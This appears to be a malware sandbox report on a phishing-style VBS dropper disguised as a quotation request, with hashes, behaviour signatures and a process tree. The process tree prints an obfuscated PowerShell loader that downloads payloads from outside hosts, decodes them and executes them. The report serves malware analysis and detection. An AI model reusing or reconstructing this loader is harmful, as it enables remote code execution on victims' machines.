Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

5

#10302024.exe

windows7-x64

7

#10302024.exe

windows10-2004-x64

7

102924_5830760.exe

windows7-x64

7

102924_5830760.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

103024_37663.exe

windows7-x64

7

103024_37663.exe

windows10-2004-x64

7

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

240827 YON...SS.exe

windows7-x64

3

240827 YON...SS.exe

windows10-2004-x64

8

AWB #281024..scr

windows7-x64

8

AWB #281024..scr

windows10-2004-x64

8

EE85716273pdf.vbs

windows7-x64

8

EE85716273pdf.vbs

windows10-2004-x64

8

Produccion.exe

windows7-x64

10

Produccion.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

Quotation.exe

windows7-x64

10

Quotation.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

報價請�...��.vbs

windows7-x64

8

報價請�...��.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/12/2024, 21:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    報價請求 - 樣本目錄.vbs

  • Size

    156KB

  • MD5

    3655ed4ac8786b349f6c824ef9fbf58c

  • SHA1

    a2c6abe2e04a0c5548288ffdaf4a9c27bc644d0b

  • SHA256

    52bc69a2c50c4bc07047508511fe4e7c17b3f380ac3a6a2f5229330b0b1a6980

  • SHA512

    1792ca76e88342a853ffd6f35cf53956d36178811b411361a5f15499570f02d225c53e83fc4d0b3c85ce1d4009466dc289c0fbeba1984da838110eb9e6519a48

  • SSDEEP

    3072:xiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqnSBu46:xiHtveXendAy3yrslay3tJuj8Sq2qb0X

Score
8/10
discovery

Malware Config

Signatures

  • Blocklisted process makes network request 26 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\報價請求 - 樣本目錄.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2096
    • C:\Windows\System32\ping.exe
      ping Horm5zl_6637.6637.6637.657e
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Runs ping.exe
      PID:4692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fiskefartjers Salomonic bullion Kyschtymite Gg Prisaendringer #>;$Vaabenfabrikken='Regier';<#Haemningsloese Euphonized Hertugdmmet Stickler #>;$Perirectitis=$nordpol+$host.UI; function Unglutinousness($Accessarily){If ($Perirectitis) {$Enden++;}$Dunjakke=$Skaansomme+$Accessarily.'Length'-$Enden; for( $Overconservative=4;$Overconservative -lt $Dunjakke;$Overconservative+=5){$Sigillography193=$Overconservative;$Kneppede+=$Accessarily[$Overconservative];$overtrdelsernes='Dyarchic';}$Kneppede;}function Slagvarer($Pigless195){ & ($Tidsplaners) ($Pigless195);}$Udenrigstjenesterne=Unglutinousness ' AppMBrndo attzLindi.alelCounlSpriay ll/Disc ';$Feltlngders=Unglutinousness ' G oTUncrl Gnas ano1Med 2Ps,u ';$Gejlende167='.dbo[RehiNPla e .ilt Opt.DiruSHabieHeinRprosv.angIAndrCMasse fripsco oPunci InjnB.rstOkkuMUdstAHornN Reua W.oGKodiE lsiRDalr] Par:Bact:ForasSteeEPle c AnkUB,nkRC.anIE viTBogsy.esupCoterFaddOTrykTCardOBlodCMoutO FosLHarm=Toop$Ta tfP stE krlPecuTXantLPantnFartgRepod ifeE,nter KaosB gn ';$Udenrigstjenesterne+=Unglutinousness 'Frys5me.n.Unex0Aflo Rep(Mgt W,usriEl,kn igd.obpoPoiswb wes Nat A keNFangTBur, Bisa1Poly0Grun.Tu n0M.lj;satr Ang,WSubtiNeedn Cla6 Tra4Ovic; ,op BurgxFodb6Ring4Skju;Rund Hj r AanvAlb :f es1Dron3 Met1Di r.Cond0Y ge)Sta S usG BeteUnvocNo skspato Rib/karr2Pala0Barn1B.ke0 aas0Klap1 Per0 Re 1S or P.iFPaamiP nnrPippePseufSculo ReaxCobr/An j1Skik3Gu.d1Omfo. Epi0Skum ';$Overconservativedrtsklub=Unglutinousness 'DecouDrejs Ud eKompR Bos-DiscaK.rsgparleDa aNSu,sTbewr ';$Fnomenologis=Unglutinousness 'T.dehSlvft biltFl,ppSa bs Bes:Obj,/Jerk/Ecc bSerrrB aiuHelttOphaa ast.UngipB lelOmo,/SkruIGrapbSk.trUdtru CysgPre t resale ig S feOplslSkuds Baae ,lps ls. Fo ppro c nubxnoni>Rigeh Supt CritLipopH glsW ea: Eng/Undi/FestpForfr AfboDr,bmAmbaeHensn Fartgue.eUnu r Arr.JordrRefisskve/sadoIAraub MarrBesluEnamgTo,ntMa.taRealgAf.veStyllBaktsMiljePed sHalv. Ledp ReacWe exHorn ';$Rancourous=Unglutinousness 'Gear>Dags ';$Tidsplaners=Unglutinousness ' su I Ovee P sxSpac ';$Febrene='Dampningen';$Overconservativenterramal131='\Hylozoist.ony';Slagvarer (Unglutinousness 'Jule$MindgAbsoLFor.OTranBRempAB biL Ile: SalatintnSteaGAllerj ggEHa bbSergsNakev.ollAP ndaSekrB,otiE EtuNStr sReto=Proc$Irrie BrunSystvRens:A stA Fl.Pnon PLased MinADepiTLazaAFina+ M s$ gebOOverVKypeE onorD laCS.nio nsnPhytS abEIndwrS,devMennAIntetUroliGenrVB.rrEUndeNSustT M sEfakuRFilcR onfaWic.m nfaaR itl Ber1 Sky3Prof1Dere ');Slagvarer (Unglutinousness 'Inta$SkrfGAssiL AyaO Eksb intaAfsvLUnve:Ant o eprTA.siARundCRutiUAffaSUnskTReac=Jeal$TurbF KonNF.rso V.nMMisrePokeN UncO sh.L.rimOZeugg,verIPhanS Fe .IdmtSU dep Mo LPiskIAc.uT or(Prfa$.ideRVandADetanDiscc.fsgO M.luSendrR spo Deau PatSFor )I ar ');Slagvarer (Unglutinousness $Gejlende167);$Fnomenologis=$Otacust[0];$Hypogastrium28=(Unglutinousness ' Fej$.illgK.ntL.picoCuraBSansa Real Hei:Bu.tsOrtso elMDiskmmap EDamnr BeagVagnsSurftTraaEQua nphil=H,miNGruneSkaawTe,r-U,fhoIndfbSejrJNerveMisiCUnloTEnem IndSLaryYFgtes tiptPhloePlanM eut. OmsNChrie Kult ila.OdalwL bre,rdlbDoigcCoryl b yIChedeContnRid t,ord ');Slagvarer ($Hypogastrium28);Slagvarer (Unglutinousness 'L ng$ HavS N eoSp rmEnk,mbew eI anrmythgG.ais V ntRnb,e Sidn unp.Aug H .pteNetta ridResteUnmarNeurs pho[verm$GrunO ligv.ankeTyverRundcLangoPlumnNigrsPyr e DudrSt.lvSulaaFyrvtFrysiPumpv brie NoxdSen rRanitSe.gsTappkAquilCarauBianbkaps]E cy= Isl$H,emUQ addSoneeKlavnPlurrPreciGnidgSodasHu htAnstjSvogelegin .ebeAb dsDeretUn,veDur.rPam nVreleReal ');$Herpetolog=Unglutinousness 'Myre$ Su.S msaoLogamFis mJ roeReg rDemigL.gasc.hotLapieustan Int. SysDTel.oU dew rknntilmlAyuboSkroaAnnidDek F,lteiChr,lTegneF,de( rdi$ProtFInt n ilioIn.rmParoeCapsnPrbeo forlTylvohaugg Subi.nissB ad,Fort$GlobAUndefTelef snkaHypotBudgtSesseBespdFooleMedasToed)Sp b ';$Affattedes=$Angrebsvaabens;Slagvarer (Unglutinousness ' im $SpgeGSabbl PsioRemaBLoksaPetrlGlug:MeleNKompoTrimNDialHSyrlyCrosp.aleeTe eRhiorBLogiO ho,LLegaiarbecBlad1 Luc1 Fla0Zany=P.ot(BaxyT FryePe.pSTu iTd ns-SummpPagoaTo dTT llhMayo Le e$ BreAMac FBndeFUngkaCarrT KleTRetseVelgdovereIndesHemo)Indf ');while (!$Nonhyperbolic110) {Slagvarer (Unglutinousness ' Ele$Sterg,glslknaloPa zbpentaNon.l Roe: CorKpistvDesia snedNazerP emaPoron lastKommeChucrKonc=Slov$Kno,tBe gr unau emfeSynk ') ;Slagvarer $Herpetolog;Slagvarer (Unglutinousness ' ros FritNonca Th rVettThauc-OrnasQ adL andeFyldEDreipEc r Udga4balt ');Slagvarer (Unglutinousness '.lum$ A rGStiklFideoDormBDodeALavrlIndm:BoarNPlagOP lyN Unbhdek.y.rappPinnEPrecRL arBPol OTel,LRubrI NetcR de1Wayf1tar,0Z nc=D pe(IlpaTDepoeUddaSGypstSeat-DrejPWorkAOprrT DacHTriv ejen$Afspaf dlfWidoFAm taUnfoTVrditFde eDelpdSp leOutnsTilg) ,nd ') ;Slagvarer (Unglutinousness 'Stam$Ov rGmathL fiOPlatBKl.bAChilLPark: fsAMiliRapicbJakoEOfthJMadedThelSJog pHerrlSkrmiEnemgOverTPietEPeasrNe snstikeFrus=Inds$JennG ,avLPersOPr,mbLampaH rml Lan:Bv eFS mmACrincT lrIVellLOpiniScalTMou.aPatlTOthaoKredRoolaYU.va3Uoev6Spar+ ,dk+ mst% Her$ CypOFolkTSupraDidycH loufuldsGudst .ap.OpkocBarnOLystuAlarnUdgaTCyto ') ;$Fnomenologis=$Otacust[$Arbejdspligterne];}$Anticipators=340909;$arbejdspladsers=30602;Slagvarer (Unglutinousness 'Unde$BageGkirslPrevOAssebAbstaVandlReak:D nusUltrH UdsEA talretstD vaE.abbRPrevdNuclkOverkMycaE CadrSwo eWin sF gb2T ll6Be l sild= ,on NedsgVolueTalwtvase-,oldcsam.oSumpn vertTilserumenP,nktSleg arc$,mbeaBallFka.ofgen aUds T Fo,t NoneUnacD t oEIam sDest ');Slagvarer (Unglutinousness 'slut$fo lgBea.lGraeo G.db Ph aDemolInsu:OutsVL,ceiHuncpAr ep C.eeFortl HanaAmildCine Myrt= Int Inn[EnebSProsyPibesPlagt AlkePropmTe n.Re rCAnstoun enSangv BareInternatut Gen]Anal:Komp: DomFHydrrFuraoDka mGro BLimia orls OtoePrec6Vedd4ske,SLivstMonorSkrhiEndenCupog.uto(Subl$Fav SCorphRabieFrihlunent ngeKor rPetadSaxkk ejlkMin.eGrunr Slve Sygs Sup2Warr6Dela)Sm.t ');Slagvarer (Unglutinousness 'Xylo$ VasgActiLTilso OmkBim aaFriel obb:B.stUByldn,empG uncD Udso VolmSkinM.wagEPostLmagnIPibeg BulE yprOog,EGotc Udhu=V nd Se,i[EkstS SokYAnkeSRegnTDeflES.mhMsvar.sprlt A,he llxAnsatDamo. elE ournBackcIn,oo BevD Subi svin ShoG No ] are: Upb: asyat elsHumaCCo sIIsneiSemi.UndsgB,llELabaTGuldsBogltComprTrapIGenoNAprjg rg(Scum$QuarvU,acIApaypWomaPNon EInkal BubA IntdLege) Arb ');Slagvarer (Unglutinousness 'Bic $Z mogGymnlProfOVartBSkilaPreslOut,: onrMBowsaAgglCKol MJo bOS,teRCoprRSm aiAllesVulc=Nonb$LeanUEminnMategLeptdBereOPrimmJernM,piseDokklSindI HilgpaakePredr KvaEGuan.SlaaS razULateb UdssB,nat PapR RacI ShoNPostG al( Di $A abAGr,nN SkatListiValdc AnoITillPBenzaSndrtS ovoEc erKexsSUnpa,e sl$g unATrapR SambSub.EOddsJGradDRudds lapTokrL HenaOmegdKam.SOr lED,nnrC taSCen )scut ');Slagvarer $Macmorris;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3356

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lfev0gkc.50i.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/3356-0-0x00007FFE640D3000-0x00007FFE640D5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3356-10-0x00000263AF8B0000-0x00000263AF8D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3356-11-0x00007FFE640D0000-0x00007FFE64B91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3356-12-0x00007FFE640D0000-0x00007FFE64B91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3356-13-0x00007FFE640D0000-0x00007FFE64B91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3356-14-0x00007FFE640D3000-0x00007FFE640D5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3356-15-0x00007FFE640D0000-0x00007FFE64B91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3356-16-0x00007FFE640D0000-0x00007FFE64B91000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3356-17-0x00007FFE640D0000-0x00007FFE64B91000-memory.dmp

    Filesize

    10.8MB

    Download